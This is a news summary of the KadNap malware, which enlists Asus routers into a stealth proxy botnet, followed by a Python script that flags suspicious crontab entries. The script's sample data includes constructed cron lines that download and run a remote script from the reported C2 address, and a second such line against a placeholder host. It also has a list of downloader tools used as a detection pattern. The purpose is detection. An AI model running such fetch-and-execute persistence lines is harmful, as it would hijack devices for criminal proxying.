KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet
Briefly

"KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring. Compromised nodes in the network leverage the DHT protocol to locate and connect with a command-and-control (C2) server, thereby making it resilient to detection and disruption efforts."
"Once devices are successfully compromised, they are marketed by a proxy service named Doppelgänger ('doppelganger[.]shop'), which is assessed to be a rebrand of Faceless, another proxy service associated with TheMoon malware. Doppelgänger, according to its website, claims to offer resident proxies in over 50 countries that provide '100% anonymity.'"
"Central to the attack is a shell script ("aic.sh") that's downloaded from the C2 server ("212.104.141[.]140"), which is responsible for initiating the process of conscripting the victim to the P2P network. The file creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to ".asusrouter," and run it."
KadNap is a newly discovered malware first detected in August 2025 that primarily targets Asus routers to recruit them into a botnet for proxying malicious traffic. The malware has infected over 14,000 devices, with more than 60% located in the U.S. and additional infections across Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain. KadNap employs a custom version of the Kademlia Distributed Hash Table protocol to conceal infrastructure within a peer-to-peer system, evading traditional network monitoring. Compromised devices are marketed through a proxy service called Doppelgänger, assessed as a rebrand of the Faceless proxy service linked to TheMoon malware. The attack uses a shell script downloaded from a command-and-control server that establishes persistence through cron jobs.
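The cron-based persistence described above is the most readily auditable part of the infection on a device that is otherwise hard to inspect. The following is an added detection example, not code from the article or from the researchers: it scans a crontab dump for entries that combine the reported indicators (a job at minute 55 of every hour, a remote fetch, the hidden ".asusrouter" file, or the reported download address). The sample crontab lines are constructed for illustration; the page does not document the exact command form of the real cron job, only its schedule, the file names and the server address.

```python
import re

# Constructed sample crontab lines (not taken from the article). Only the
# address 212.104.141[.]140, the file name aic.sh, the ".asusrouter" name and
# the 55-minute schedule come from the reporting; the command shape is assumed.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /sbin/logrotate
55 * * * * wget -q http://212.104.141.140/aic.sh -O /tmp/.asusrouter && sh /tmp/.asusrouter
*/5 * * * * /usr/sbin/ntpclient -h pool.ntp.org
55 * * * * curl -s http://example.invalid/update.sh -o /var/.asusrouter; sh /var/.asusrouter
"""

# Address reported as the source of aic.sh (un-defanged so it matches a real crontab).
KNOWN_C2 = {"212.104.141.140"}
# Common fetch tools found on BusyBox-based router firmware.
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
# The hidden file name the script is renamed to after download.
HIDDEN_DROP = re.compile(r"/\.asusrouter\b")


def parse_cron_line(line):
    """Split one crontab line into (minute, hour, dom, mon, dow, command).

    Returns None for blank lines, comments and lines with fewer than six fields.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return tuple(parts)


def assess_cron_line(line):
    """Return the list of indicator names that fire for one crontab line."""
    fields = parse_cron_line(line)
    if fields is None:
        return []
    minute, hour, _dom, _mon, _dow, command = fields
    hits = []
    # Schedule reported for KadNap: the 55-minute mark of every hour.
    if minute == "55" and hour == "*":
        hits.append("hourly_minute_55_schedule")
    # A scheduled job that pulls content from the network is unusual on a router.
    if DOWNLOADERS.search(command):
        hits.append("remote_fetch_in_cron")
    # Dot-prefixed file named to blend in with the vendor's own components.
    if HIDDEN_DROP.search(command):
        hits.append("asusrouter_hidden_file")
    # Direct match on the reported download server.
    for ip in KNOWN_C2:
        if ip in command:
            hits.append("known_c2_address")
    return hits


def scan_crontab(text):
    """Map each crontab line that fires two or more indicators to its indicators.

    Requiring two indicators keeps a lone 'minute 55' job or a benign wget
    from being reported on its own; a known C2 hit alone is still worth a look
    and is therefore reported even when it is the only indicator.
    """
    findings = {}
    for line in text.splitlines():
        hits = assess_cron_line(line)
        if len(hits) >= 2 or "known_c2_address" in hits:
            findings[line.strip()] = hits
    return findings


if __name__ == "__main__":
    for entry, hits in scan_crontab(SAMPLE_CRONTAB).items():
        print(f"SUSPECT: {entry}\n    indicators: {', '.join(hits)}")
```

On a live device the input would be the output of `crontab -l` for each user or the contents of the cron spool directory; the scoring is deliberately conservative so that a single coincidental match (a legitimate job at minute 55, or a firmware update fetch) is not reported by itself, while the reported address is always surfaced.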
Read at The Hacker News